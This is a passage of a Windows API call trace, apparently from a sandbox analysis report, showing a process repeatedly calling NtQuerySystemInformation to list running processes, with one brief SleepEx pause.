NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0179.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x141a8) returned 0x0 [0180.315] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0182.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0182.886] 